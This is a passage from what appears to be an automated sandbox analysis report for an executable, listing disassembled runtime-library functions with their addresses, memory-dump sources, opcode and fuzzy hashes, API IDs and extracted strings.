                                                                                                                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                      • Instruction ID: ea22a9ceabe4f21caf947149c83ca4085102e6e9c6bc832b16de07e8bfdef316
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A11E521F0C5C282FB54A76AE5442F99A92FB88780FD88230DB7907BD9CD7DD5D1C2A0
                                                                                                                                                                                                      Function 00007FFBBB6076FC Relevance: 6.0, APIs: 4, Instructions: 40threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocFreeMem_Thread_free_lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2783890233-0
                                                                                                                                                                                                      • Opcode ID: 4f5a2f9c344497e93ef028251fd81299d8f3afbb09a68fff93368c8b0e6b2a83
                                                                                                                                                                                                      • Instruction ID: 358acf1180b38118e3eb6dceb59771832f1a0eec72833d9cc836adba8c26595d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f5a2f9c344497e93ef028251fd81299d8f3afbb09a68fff93368c8b0e6b2a83
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E911E8A2A0994285EE5D8B7ADD94378A360FB48B95F589130DB1F42574CF2CE8958308
                                                                                                                                                                                                      Function 00007FF7FF58D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                      • Instruction ID: d956370f095327b0a8fec152f3f840f2f1dfe7a48a71acb42c300fac3105d4b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15114C22B15B458AEB00DB60E8542F973B4FB19758F840E31DA3D477A4DF38D1648390
                                                                                                                                                                                                      Function 00007FFBBB63A530 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: 925f1272a8eec2639c20e383994221c7073682bc52a01940fe0b830d159c3720
                                                                                                                                                                                                      • Instruction ID: 889bdc18d39292b128fd983dd8ded0ea3e8b30374b7c8ac14a7160539876e21c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 925f1272a8eec2639c20e383994221c7073682bc52a01940fe0b830d159c3720
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F114C62B14F058AEB008F78EC452A873A4FB59B98F040E31DB6E427A8DF3CD955C340
                                                                                                                                                                                                      Function 00007FFBAAA65BD4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498820665.00007FFBAA8A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFBAA8A0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498796628.00007FFBAA8A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1499325131.00007FFBAAB56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1499325131.00007FFBAAB77000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1499325131.00007FFBAAB86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1499325131.00007FFBAAB90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1499325131.00007FFBAABD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1499325131.00007FFBAACA1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1500545912.00007FFBAADB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1503754396.00007FFBAADC8000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1503793241.00007FFBAADCD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1503828649.00007FFBAADCE000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1503984244.00007FFBAADCF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1504010283.00007FFBAADD0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1504054929.00007FFBAADF6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1504180502.00007FFBAADF8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1504224238.00007FFBAAE00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507037076.00007FFBAAE41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507137885.00007FFBAAE75000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507175590.00007FFBAAE9D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507199272.00007FFBAAEA0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507224854.00007FFBAAEA1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507252662.00007FFBAAEA2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507284955.00007FFBAAEA3000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507323660.00007FFBAAEA5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507400615.00007FFBAAEB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507400615.00007FFBAAEB9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507461882.00007FFBAAEE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507486913.00007FFBAAEE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbaa8a0000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: 4c843af704d4999d6b1dd3508e9d37868a4ccb8a5710554f336d0007bef571e5
                                                                                                                                                                                                      • Instruction ID: b6727e45d5f7fc51a5e928a301123973d36d8bd56cc3b0546c89e3b1a2a03b66
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c843af704d4999d6b1dd3508e9d37868a4ccb8a5710554f336d0007bef571e5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09114F66B15F02C9EB00CF70E8542A833A8FB19758F440A35EE6D42794DF38D1558350
                                                                                                                                                                                                      Function 00007FFBBB61338C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: aed7f86fc7a11c6df5e40bac6b102b5ddb6009efbef7b18aee2bd32e475f136b
                                                                                                                                                                                                      • Instruction ID: ca9a1274d1e67a83e37104031b8fea4f4dafdc8df778e9126140513feea157d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aed7f86fc7a11c6df5e40bac6b102b5ddb6009efbef7b18aee2bd32e475f136b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C1115A6B14F018AEB00CF74EC543B873A4FB19758F445A31EB6E867A4DF78D5988340
                                                                                                                                                                                                      Function 00007FFBBCD50D5C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: 15bdf73cda2f41086707368dd9349a273cb6e4dedd62d10c03f2e51642f891d7
                                                                                                                                                                                                      • Instruction ID: b078ee3949d9209accfb1fbc45f75cb88c56423734a6c7607804021d9e62df60
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15bdf73cda2f41086707368dd9349a273cb6e4dedd62d10c03f2e51642f891d7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 271118AAB14B018AEB00CB78E8592A933A4FB59758F440E31DB6D867A4DF7CE5598340
                                                                                                                                                                                                      Function 00007FF7FF5A5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                                                      • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                      • Instruction ID: d01e687f5c737a1716513eb621d5cf813aec06a6f1a0f07a87aa6a2680b5a6bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8412822A092C242FB24AB25A451BB9E650EB92FA4F944335EE7C07AD9DF3CD451C750
                                                                                                                                                                                                      Function 00007FF7FF599084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5990B6
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7FF58CC15), ref: 00007FF7FF5990D4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                      • API String ID: 3580290477-2366978088
                                                                                                                                                                                                      • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                      • Instruction ID: 116025176c9ba06b75a6b1c5997c503702ba13ee47ba7defce06554ddc0d27b7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E417132A0879285EB28BF2594800FDA7A4FB457D0BD54235E97E43BC5DE3CE48283E0
                                                                                                                                                                                                      Function 00007FF7FF59CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                      • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                      • Instruction ID: 4350fd86aabc0073b0910ea94eab0ec3ec10ade74b9cb836cc04849bbc619faf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8441A472B19BC685DB609F25E4443E9A760FB88794F845231EE6D87B98EF3CD401C790
                                                                                                                                                                                                      Function 00007FFBBCD48DB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: void$void
                                                                                                                                                                                                      • API String ID: 2943138195-3746155364
                                                                                                                                                                                                      • Opcode ID: 9a107da830986a561f624b9ef5478456632fe2e7b7c502874fad34e42bf4480a
                                                                                                                                                                                                      • Instruction ID: f919ea962d514bd11df59845f09185aa487075293fc0c723f568f0edad2012d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a107da830986a561f624b9ef5478456632fe2e7b7c502874fad34e42bf4480a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 793107FAF18B5599FB11CBB8D8480EC37B0BB48788B440136DB4E66B59EF389145C758
                                                                                                                                                                                                      Function 00007FF7FF59F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                                                      • Opcode ID: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
                                                                                                                                                                                                      • Instruction ID: 9fc44e8121d8efa71f70279b571c035e06d98e4d0367eb3b9010fceeea1011ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C21C362A082C182EB38AB15D0442ADB3F5FB84B84FD54235D6BD436D4DF7CD9558BA0
                                                                                                                                                                                                      Function 00007FFBBCD44E2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileHeader$ExceptionRaise
                                                                                                                                                                                                      • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                                                                                                      • API String ID: 3685223789-3176238549
                                                                                                                                                                                                      • Opcode ID: 31c157b8eb2ec39060d8679ded3c8c7a40717f4d930d4d3a676af0386f3d6913
                                                                                                                                                                                                      • Instruction ID: 3b7c01dbdbed19f8ba1d7a96c5fb389fdd233a8b164e7eb0b056f7e6a01491bd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31c157b8eb2ec39060d8679ded3c8c7a40717f4d930d4d3a676af0386f3d6913
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 000184E9B29A46D3EE40DB38E4595786360FF90B44F849032E74E07665EF6CE949C708
                                                                                                                                                                                                      Function 00007FF7FF58FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
